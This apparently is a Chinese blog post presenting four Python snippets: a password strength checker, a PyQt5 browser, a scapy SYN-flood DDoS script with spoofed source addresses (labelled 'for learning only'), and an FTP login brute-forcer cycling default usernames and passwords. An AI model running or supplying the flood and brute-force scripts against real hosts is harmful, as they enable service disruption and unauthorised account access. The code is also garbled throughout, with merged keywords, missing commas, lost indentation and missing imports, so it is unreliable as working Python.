當前位置: 妍妍網 > 碼農

四個實用Python例項

2024-05-10碼農

「1.密碼強度檢測器」

import re
def password_strength_checker(password):
# 定義密碼強度的規則
rules = {
'length'len(password) >= 8,
'lowercase': re.search(r'[a-z]', password) isnotNone,
'uppercase': re.search(r'[A-Z]', password) isnotNone,
'numbers': re.search(r'\d', password) isnotNone,
'special_chars': re.search(r'[^a-zA-Z0-9]', password) isnotNone,
'no_repeats'len(set(password)) == len(password),
}
# 根據規則計算密碼強度
strength = 'Weak'
ifall(rules.values()):
strength = 'Strong'
elifany(rules.values()) andnotall(rules.values()):
strength = 'Medium'
# 返回密碼強度和未透過的規則
failed_rules = [rule for rule, passed in rules.items() ifnot passed]
return strength, failed_rules
# 範例密碼
password = input("Enter your password to check its strength: ")
# 檢查密碼強度
strength, failed_rules = password_strength_checker(password)
# 輸出結果
print(f"Password Strength: {strength}")
if failed_rules:
print(f"Failed Rules: {', '.join(failed_rules)}")
else:
print("Your password passed all the rules!")



「2.Ddos攻擊(僅供學習)」

import random
from scapy.all import *
def synFlood(tgt, dPort):
srcList = ['192.168.1.' + str(x) for x in range(1, 255)] # 偽造的源 IP 地址列表
for _ in range(1000): # 發送大量封包
sPort = random.randint(1024, 65535) # 隨機源埠
index = random.randrange(len(srcList)) # 隨機選擇一個偽造的源 IP
ipLayer = IP(src=srcList[index], dst=tgt)
tcpLayer = TCP(sport=sPort, dport=dPort, flags="S")
packet = ipLayer / tcpLayer
send(packet, verbose=0) # 發送封包,verbose=0 表示不顯示發送狀態
synFlood("192.168.1.100", 80) # 目標 IP 和埠

「3.簡單瀏覽器」

import sys
from PyQt5.QtCore import QUrl
from PyQt5.QtWidgets import QApplication, QMainWindow, QVBoxLayout, QLineEdit, QPushButton, QWidget
class SimpleBrowser(QMainWindow):
def __init__(self):
super().__init__()
self.browser = QWebEngineView()
self.setCentralWidget(self.browser)
self.url_bar = QLineEdit(self)
self.url_bar.returnPressed.connect(self.navigate_to_url)
self.back_button = QPushButton('Back')
self.back_button.clicked.connect(self.browser.back)
self.forward_button = QPushButton('Forward')
self.forward_button.clicked.connect(self.browser.forward)
layout = QVBoxLayout()
layout.addWidget(self.url_bar)
layout.addWidget(self.back_button)
layout.addWidget(self.forward_button)
widget = QWidget()
widget.setLayout(layout)
self.addDockWidget(Qt.LeftDockWidgetArea, widget)
def navigate_to_url(self):
url = self.url_bar.text()
self.browser.load(QUrl(url))
if __name__ == '__main__':
app = QApplication(sys.argv)
browser = SimpleBrowser()
browser.show()
sys.exit(app.exec_())






「4.FTP後台掃描」

import ftplib
# 目標FTP伺服器的IP地址或網域名稱
ftp_host = 'your_ftp_server_ip'
# 嘗試的使用者名稱列表
usernames = ['admin''user''ftp''guest']
# 嘗試的密碼列表
passwords = ['admin''123456''password''']
# 函式嘗試使用者名稱和密碼組合
def try_credentials(user, passwd):
try:
ftp = ftplib.FTP(ftp_host)
ftp.login(user, passwd)
print(f"Success: {user}:{passwd}")
ftp.quit()
except ftplib.error_perm as e:
print(f"Failed: {user}:{passwd} - {e}")
except Exception as e:
print(f"Error: {user}:{passwd} - {e}")
# 遍歷使用者名稱和密碼列表,嘗試每一種組合
for username in usernames:
for password in passwords:
try_credentials(username, password)